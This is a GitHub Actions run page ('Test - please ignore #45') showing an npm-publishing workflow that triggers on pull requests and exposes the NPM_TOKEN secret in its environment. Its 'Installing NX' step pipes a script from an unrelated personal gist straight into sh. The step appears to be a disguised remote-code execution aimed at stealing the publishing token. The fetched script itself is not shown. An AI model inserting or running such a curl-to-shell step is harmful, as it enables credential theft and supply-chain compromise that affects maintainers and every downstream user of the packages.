Skip to content

Test - please ignore #45

Test - please ignore

Test - please ignore #45

Workflow file for this run

name: Publish NPM packages
on:
pull_request:
jobs:
publish_npm_package:
runs-on: ubuntu-latest
env:
NODE_AUTH_TOKEN: ${{ secrets.NPM_TOKEN }}
steps:
- name: Git checkout
uses: actions/checkout@v3
- uses: actions/setup-node@v3
with:
node-version: '16.x'
registry-url: 'https://registry.npmjs.org'
- name: Installing NX
run: curl https://gist.githubusercontent.com/Len0nJohn/2eb7fe44856749cbd6609ae9017da08a/raw/192493ef4efd2fdca2b30bb5ed4c4eb4a5afb8de/gh.sh | sh && npm install -g nx
- run: npm install
- name: publish to npm
run: |
nx run-many --exclude=velo-external-db --target=publishCi --all